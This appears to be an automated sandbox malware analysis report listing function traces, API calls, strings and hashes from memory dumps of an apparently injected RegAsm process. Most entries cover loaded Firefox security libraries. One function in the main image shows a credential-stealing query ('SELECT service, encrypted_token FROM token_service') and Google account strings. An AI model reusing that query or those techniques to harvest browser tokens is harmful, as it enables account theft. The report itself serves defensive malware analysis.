                                                                                    Function 6CD82CD0 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 73COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PR_LogPrint.NSS3(C_InitToken), ref: 6CD82CEC
                                                                                    • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CD82D07
                                                                                      • Part of subcall function 6CE609D0: PR_Now.NSS3 ref: 6CE60A22
                                                                                      • Part of subcall function 6CE609D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CE60A35
                                                                                      • Part of subcall function 6CE609D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CE60A66
                                                                                      • Part of subcall function 6CE609D0: PR_GetCurrentThread.NSS3 ref: 6CE60A70
                                                                                      • Part of subcall function 6CE609D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CE60A9D
                                                                                      • Part of subcall function 6CE609D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CE60AC8
                                                                                      • Part of subcall function 6CE609D0: PR_vsmprintf.NSS3(?,?), ref: 6CE60AE8
                                                                                      • Part of subcall function 6CE609D0: EnterCriticalSection.KERNEL32(?), ref: 6CE60B19
                                                                                      • Part of subcall function 6CE609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CE60B48
                                                                                      • Part of subcall function 6CE609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CE60C76
                                                                                      • Part of subcall function 6CE609D0: PR_LogFlush.NSS3 ref: 6CE60C7E
                                                                                    • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CD82D22
                                                                                      • Part of subcall function 6CE609D0: OutputDebugStringA.KERNEL32(?), ref: 6CE60B88
                                                                                      • Part of subcall function 6CE609D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CE60C5D
                                                                                      • Part of subcall function 6CE609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CE60C8D
                                                                                      • Part of subcall function 6CE609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CE60C9C
                                                                                      • Part of subcall function 6CE609D0: OutputDebugStringA.KERNEL32(?), ref: 6CE60CD1
                                                                                      • Part of subcall function 6CE609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CE60CEC
                                                                                      • Part of subcall function 6CE609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CE60CFB
                                                                                      • Part of subcall function 6CE609D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CE60D16
                                                                                      • Part of subcall function 6CE609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CE60D26
                                                                                      • Part of subcall function 6CE609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CE60D35
                                                                                      • Part of subcall function 6CE609D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CE60D65
                                                                                      • Part of subcall function 6CE609D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CE60D70
                                                                                      • Part of subcall function 6CE609D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CE60D90
                                                                                      • Part of subcall function 6CE609D0: free.MOZGLUE(00000000), ref: 6CE60D99
                                                                                    • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CD82D3B
                                                                                      • Part of subcall function 6CE609D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CE60BAB
                                                                                      • Part of subcall function 6CE609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CE60BBA
                                                                                      • Part of subcall function 6CE609D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CE60D7E
                                                                                    • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6CD82D54
                                                                                      • Part of subcall function 6CE609D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CE60BCB
                                                                                      • Part of subcall function 6CE609D0: EnterCriticalSection.KERNEL32(?), ref: 6CE60BDE
                                                                                      • Part of subcall function 6CE609D0: OutputDebugStringA.KERNEL32(?), ref: 6CE60C16
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537699692.000000006CCD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CCD0000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537650615.000000006CCD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538473689.000000006CEAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538508502.000000006CEAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538542365.000000006CEB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538578827.000000006CEB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6ccd0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                    • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$nl
                                                                                    • API String ID: 420000887-3348607798
                                                                                    • Opcode ID: 0f1379c0620fe92460866e2f4922ea9ec95a65d54e4c0d78f6dc7520c3a492c2
                                                                                    • Instruction ID: 00f87d5ab00c034bb19a5b8043e78a68d4b3011f3d46c88aeb9daaaa095c4a70
                                                                                    • Opcode Fuzzy Hash: 0f1379c0620fe92460866e2f4922ea9ec95a65d54e4c0d78f6dc7520c3a492c2
                                                                                    • Instruction Fuzzy Hash: B721DA76602144EFDB019F54DF4CA693FB2EF8231DF548064E90897A72D7709849CBB5
                                                                                    Function 6CC78ED0 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 311COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CC3EB30: free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CC3EB83
                                                                                    • ?FormatToStringSpan@MarkerSchema@mozilla@@CA?AV?$Span@$$CBD$0PPPPPPPP@@2@W4Format@12@@Z.MOZGLUE(?,?,00000004,?,?,?,?,?,?,6CC7B392,?,?,00000001), ref: 6CC791F4
                                                                                      • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                                      • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Process$CurrentFormatFormat@12@@MarkerP@@2@Schema@mozilla@@Span@Span@$$StringTerminatefree
                                                                                    • String ID: data$marker-chart$marker-table$name$stack-chart$timeline-fileio$timeline-ipc$timeline-memory$timeline-overview
                                                                                    • API String ID: 3790164461-3347204862
                                                                                    • Opcode ID: 636f2ccf26a5ee0907b789879e4e718fcd2caddc5bf4bb09952b97df2e5aafbf
                                                                                    • Instruction ID: 0c4efa25f905736eceef55707aba2a532bc01767e8cc9e2cc0dd2c328e6e6fd5
                                                                                    • Opcode Fuzzy Hash: 636f2ccf26a5ee0907b789879e4e718fcd2caddc5bf4bb09952b97df2e5aafbf
                                                                                    • Instruction Fuzzy Hash: 97B1C4B0A0120A9BDB14CFA9C895BEEBBB5FF85358F104019D905ABF80F7319945CBE1
                                                                                    Function 6CC5C570 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 277stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC5C5A3
                                                                                    • WideCharToMultiByte.KERNEL32 ref: 6CC5C9EA
                                                                                    • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6CC5C9FB
                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 6CC5CA12
                                                                                    • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CC5CA2E
                                                                                    • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6CC5CAA5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ByteCharMultiWidestrlen$freemalloc
                                                                                    • String ID: (null)$0
                                                                                    • API String ID: 4074790623-38302674
                                                                                    • Opcode ID: 2819172353aa728e3dac5af3b3757e855eb0986eb86c10ce2db094ef8050daf8
                                                                                    • Instruction ID: 0d33ddf7d7e43faeb4ab26ca9b4bae91f20132de202599faa0f6807b7c72b0ef
                                                                                    • Opcode Fuzzy Hash: 2819172353aa728e3dac5af3b3757e855eb0986eb86c10ce2db094ef8050daf8
                                                                                    • Instruction Fuzzy Hash: C9A19C716083429FDB00DF29C98475ABBF1FF89748F44882DE899D7641EB31D825CB9A
                                                                                    Function 6CC5C769 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 159COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6CC5C784
                                                                                    • _dsign.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6CC5C801
                                                                                    • _dtest.API-MS-WIN-CRT-MATH-L1-1-0(?), ref: 6CC5C83D
                                                                                    • ?ToPrecision@DoubleToStringConverter@double_conversion@@QBE_NNHPAVStringBuilder@2@@Z.MOZGLUE ref: 6CC5C891
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: String$Builder@2@@Converter@double_conversion@@DoublePrecision@_dsign_dtestislower
                                                                                    • String ID: INF$NAN$inf$nan
                                                                                    • API String ID: 1991403756-4166689840
                                                                                    • Opcode ID: e7d4d5bb30827784ae3fc954e276b9615268e6332ef3ea422cef169ddb1e82cc
                                                                                    • Instruction ID: 4c7851381f7f93ec6a11652519b002619245002b9f1df180a070a7477c6520a2
                                                                                    • Opcode Fuzzy Hash: e7d4d5bb30827784ae3fc954e276b9615268e6332ef3ea422cef169ddb1e82cc
                                                                                    • Instruction Fuzzy Hash: 73517F709087408BD700EF6DC58129AFBF0BF9E348F408A2DE9D5A7651F770D9A58B46
                                                                                    Function 6CC33480 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 86librarytimeloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC33492
                                                                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC334A9
                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC334EF
                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 6CC3350E
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC33522
                                                                                    • __aulldiv.LIBCMT ref: 6CC33552
                                                                                    • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC3357C
                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC33592
                                                                                      • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                                      • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CriticalLibraryProcessSectionTime$AddressCurrentEnterFileFreeInit_thread_footerLeaveLoadProcSystemTimes__aulldiv
                                                                                    • String ID: GetSystemTimePreciseAsFileTime$kernel32.dll
                                                                                    • API String ID: 3634367004-706389432
                                                                                    • Opcode ID: ff96e90ec97a0c72975c3f0b5b8e4e55d8daf5a1710aa8b6562444c51d891652
                                                                                    • Instruction ID: edc28577c8aea47a583d8feb27e1eaa829eea6e1ce6bde14b464af23201402fb
                                                                                    • Opcode Fuzzy Hash: ff96e90ec97a0c72975c3f0b5b8e4e55d8daf5a1710aa8b6562444c51d891652
                                                                                    • Instruction Fuzzy Hash: 4D318F79B00216AFDF04DFF9D9A8AAA77B5FB45304F140029E905A3760FB74A905CB64
                                                                                    Function 6CD9ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CD9DE64), ref: 6CD9ED0C
                                                                                    • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CD9ED22
                                                                                      • Part of subcall function 6CDAB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CE818D0,?), ref: 6CDAB095
                                                                                    • PL_FreeArenaPool.NSS3(?), ref: 6CD9ED4A
                                                                                    • PL_FinishArenaPool.NSS3(?), ref: 6CD9ED6B
                                                                                    • PR_CallOnce.NSS3(6CEB2AA4,6CDB12D0), ref: 6CD9ED38
                                                                                      • Part of subcall function 6CCD4C70: TlsGetValue.KERNEL32(?,?,?,6CCD3921,6CEB14E4,6CE1CC70), ref: 6CCD4C97
                                                                                      • Part of subcall function 6CCD4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CCD3921,6CEB14E4,6CE1CC70), ref: 6CCD4CB0
                                                                                      • Part of subcall function 6CCD4C70: PR_Unlock.NSS3(?,?,?,?,?,6CCD3921,6CEB14E4,6CE1CC70), ref: 6CCD4CC9
                                                                                    • SECOID_FindOID_Util.NSS3(?), ref: 6CD9ED52
                                                                                    • PR_CallOnce.NSS3(6CEB2AA4,6CDB12D0), ref: 6CD9ED83
                                                                                    • PL_FreeArenaPool.NSS3(?), ref: 6CD9ED95
                                                                                    • PL_FinishArenaPool.NSS3(?), ref: 6CD9ED9D
                                                                                      • Part of subcall function 6CDB64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CDB127C,00000000,00000000,00000000), ref: 6CDB650E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537699692.000000006CCD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CCD0000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537650615.000000006CCD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538473689.000000006CEAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538508502.000000006CEAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538542365.000000006CEB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538578827.000000006CEB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6ccd0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                    • String ID: security
                                                                                    • API String ID: 3323615905-3315324353
                                                                                    • Opcode ID: f8582a26d9f356dd89830b157021634440e3af62758b263e2923c0f2f0eb31ed
                                                                                    • Instruction ID: 04b32407ce55f249f2414cd1245f69fc2a5dee33a398d26d5a85c871f02ba9b2
                                                                                    • Opcode Fuzzy Hash: f8582a26d9f356dd89830b157021634440e3af62758b263e2923c0f2f0eb31ed
                                                                                    • Instruction Fuzzy Hash: 77116AB9D00214ABE7105762AC85BBFB278BF4260CF050828E84673E70FB35A50DC6E6
                                                                                    Function 6CC34480 Relevance: 16.8, APIs: 11, Instructions: 316COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$moz_xmalloc
                                                                                    • String ID:
                                                                                    • API String ID: 3009372454-0
                                                                                    • Opcode ID: 7b37956dfa3fc138de62f9958c9f244c03cc508dae8da5b364b3fa484d6a3722
                                                                                    • Instruction ID: ff3c0450668a1d5056512e62edd2afd3b279d8599230692782be0fb4514e6c8c
                                                                                    • Opcode Fuzzy Hash: 7b37956dfa3fc138de62f9958c9f244c03cc508dae8da5b364b3fa484d6a3722
                                                                                    • Instruction Fuzzy Hash: FBB1D671A015208FDB14DF2CE89476D7BB1AF42318F185669E81ADFB96F732D840CB92
                                                                                    Function 6CC9AC20 Relevance: 16.6, APIs: 11, Instructions: 92fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$View$CloseHandle$CreateInfoSystemUnmap$Mapping
                                                                                    • String ID:
                                                                                    • API String ID: 1192971331-0
                                                                                    • Opcode ID: 7955cbc67ea8520dd5f9505be140c231ceab7df21003ad080998791025faa6a6
                                                                                    • Instruction ID: e3348bc33ade1096fecf8a16a0bfc9527c122150a00c4ea79ebfef773ae178c0
                                                                                    • Opcode Fuzzy Hash: 7955cbc67ea8520dd5f9505be140c231ceab7df21003ad080998791025faa6a6
                                                                                    • Instruction Fuzzy Hash: 1E3185B19047458FDB00EFBDD68926EBBF0FF85305F014A2DE98587261EB709458CB92
                                                                                    Function 00407EC7 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 308stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00407ECC
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004080EE
                                                                                      • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                                    • StrStrA.SHLWAPI(00000000,AccountId), ref: 00408113
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 004081FD
                                                                                    • lstrlenA.KERNEL32(00000000), ref: 00408211
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
                                                                                      • Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
                                                                                      • Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
                                                                                      • Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prologlstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                    • String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
                                                                                    • API String ID: 832884763-1713091031
                                                                                    • Opcode ID: 9e473acaa7000a16f916d9206d318f59038c924e77a66daf7054869979685d7c
                                                                                    • Instruction ID: 2ff93f77293c051160f002e01a69198dfe14dafa49777a61f2f3f3b536af27c9
                                                                                    • Opcode Fuzzy Hash: 9e473acaa7000a16f916d9206d318f59038c924e77a66daf7054869979685d7c
                                                                                    • Instruction Fuzzy Hash: 2DC14A71904248EADB15EBE5D956BEDBBB4AF18308F5040BEE406725C2DF782B0CCB25
                                                                                    Function 6CC49620 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 103libraryloaderCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6CC49675
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC49697
                                                                                    • LoadLibraryW.KERNEL32(ntdll.dll), ref: 6CC496E8
                                                                                    • GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6CC49707
                                                                                    • __Init_thread_footer.LIBCMT ref: 6CC4971F
                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC49773
                                                                                      • Part of subcall function 6CC6AB89: EnterCriticalSection.KERNEL32(6CCBE370,?,?,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284), ref: 6CC6AB94
                                                                                      • Part of subcall function 6CC6AB89: LeaveCriticalSection.KERNEL32(6CCBE370,?,6CC334DE,6CCBF6CC,?,?,?,?,?,?,?,6CC33284,?,?,6CC556F6), ref: 6CC6ABD1
                                                                                    • GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6CC497B7
                                                                                    • FreeLibrary.KERNEL32 ref: 6CC497D0
                                                                                    • FreeLibrary.KERNEL32 ref: 6CC497EB
                                                                                    • SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6CC49824
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressCriticalErrorFreeInit_thread_footerLastLoadProcSection$EnterLeave
                                                                                    • String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
                                                                                    • API String ID: 409848716-3880535382
                                                                                    • Opcode ID: 375ecae539433f7f7cea4ae29875b971b86db83afa0741fd80b2b20a701fa365
                                                                                    • Instruction ID: 0a6b52c396934239eb5382cd11bc346325642a2a766f28994c9e4afe120d67a2
                                                                                    • Opcode Fuzzy Hash: 375ecae539433f7f7cea4ae29875b971b86db83afa0741fd80b2b20a701fa365
